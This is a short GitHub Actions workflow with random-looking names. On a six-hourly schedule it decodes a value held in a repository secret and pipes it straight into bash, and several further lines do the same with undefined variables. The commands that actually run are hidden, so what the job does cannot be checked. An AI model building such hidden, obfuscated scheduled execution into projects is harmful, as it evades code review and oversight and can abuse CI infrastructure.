name: xinnianyt

on:
  workflow_dispatch:
  schedule:
    - cron: '18 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xinnianyt
        env:
          cxtp4666: ${{ secrets.cxtp4666 }}
        run: |
          echo $cxtp4666 | jq -r .cfi93423 | /bin/bash
          echo $nvybo7069 | jq -r .zmhyp89 | /bin/bash
          echo $cab54 | jq -r .o7 | /bin/bash
          echo $ieq1658 | jq -r .olzsw6 | /bin/bash
          echo $ownbm164 | jq -r .ct23832 | /bin/bash
          echo $ypcta7017 | jq -r .xho6088 | /bin/bash
          echo $dt84746 | jq -r .povlb876 | /bin/bash

